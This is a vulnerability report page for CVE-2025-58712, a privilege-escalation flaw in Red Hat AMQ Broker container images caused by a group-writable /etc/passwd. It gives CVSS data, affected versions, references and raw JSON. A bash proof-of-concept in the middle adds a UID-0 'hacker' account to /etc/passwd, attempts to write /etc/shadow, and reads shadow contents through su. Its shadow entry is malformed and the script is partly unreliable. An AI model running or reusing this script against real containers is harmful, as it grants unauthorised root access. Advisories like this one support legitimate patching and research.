Security Vulnerability Report
CVE-2025-58712 CVSS 6.4 MEDIUM

Published: 2025-10-22 19:15:34
Last Modified: 2026-04-15 00:35:42

Description

A container privilege escalation flaw was found in certain AMQ Broker images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available. Affected products:

Red Hat AMQ Broker 7.12.0
Red Hat AMQ Broker 7.11.x
Red Hat AMQ Broker 7.10.x
Red Hat AMQ Broker 7.9.x
Red Hat AMQ Broker 7.8.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-58712 PoC - AMQ Broker Container Privilege Escalation
# Requirements: Non-root user with root group membership in affected container

# Step 1: Check current user and group membership
echo "[+] Current user info:"
id

# Step 2: Verify /etc/passwd is group-writable
if [ -w /etc/passwd ]; then
    echo "[+] /etc/passwd is group-writable - Target vulnerable!"
else
    echo "[-] /etc/passwd is not group-writable - Target may not be vulnerable"
fi

# Step 3: Generate password hash for new root user
PASSWORD="hacked123"
SALT="aa"
HASH=$(python3 -c "import crypt; print(crypt.crypt('$PASSWORD', '\$6\$$SALT'))")

# Step 4: Backup original /etc/passwd
cp /etc/passwd /tmp/passwd.bak

# Step 5: Add new root user to /etc/passwd
NEW_USER="hacker:x:0:0:root:/root:/bin/bash"
echo "$NEW_USER" >> /etc/passwd

# Step 6: Set password for the new root user (requires /etc/shadow or alternative)
echo "hacker:$HASH:0:0:99999:0::0:" >> /etc/shadow 2>/dev/null || echo "[!] Shadow file not writable, using alternative method"

# Step 7: Verify privilege escalation
echo "[+] Attempting to verify root access..."
su - hacker -c "whoami && id && cat /etc/shadow | head -1"
echo "[+] Privilege escalation completed! New root user 'hacker' created."

References

Weakness: CWE-276 (Incorrect Default Permissions)

https://access.redhat.com/errata/RHSA-2025:17562
https://access.redhat.com/security/cve/CVE-2025-58712
https://bugzilla.redhat.com/show_bug.cgi?id=2394418

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58712", "sourceIdentifier": "[email protected]", "published": "2025-10-22T19:15:34.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A container privilege escalation flaw was found in certain AMQ Broker images. This issue stems from the /etc/passwd file being created with group-writable permissions during build time. In certain conditions, an attacker who can execute commands within an affected container, even as a non-root user, can leverage their membership in the root group to modify the /etc/passwd file. This could allow the attacker to add a new user with any arbitrary UID, including UID 0, leading to full root privileges within the container."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2025:17562", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-58712", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2394418", "source": "[email protected]"}]}}